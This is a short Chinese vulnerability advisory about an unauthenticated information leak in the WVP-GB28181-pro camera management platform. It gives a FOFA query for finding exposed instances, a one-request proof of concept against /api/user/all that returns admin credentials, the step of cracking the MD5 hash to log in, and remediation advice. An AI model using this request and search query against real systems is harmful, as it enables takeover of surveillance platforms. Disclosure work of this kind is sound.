0x01 产品简介

GB28181是公共安全视频监控联网系统信息传输、交换、控制技术要求的标准。该标准主要定义了基于IP网络的音视频监控系统的整体架构，包括前端设备、存储设备、管理平台等组成部分，以及设备接入、流媒体传输、信令交互、存储管理、安全防护和平台管理等方面的要求。

0x02 漏洞概述

WVP-GB28181-pro开源物联网摄像头管理平台api/user接口村存在信息泄露漏洞，攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统，使系统处于极不安全的状态

0x03 复现环境

FOFA：body="国标28181"

0x04 漏洞复现

PoC

GET /api/user/all HTTP/1.1
Host: your-ip

解密密码md5值即可登录后台

0x05 修复建议

删除该接口或设置访问控制

升级至安全版本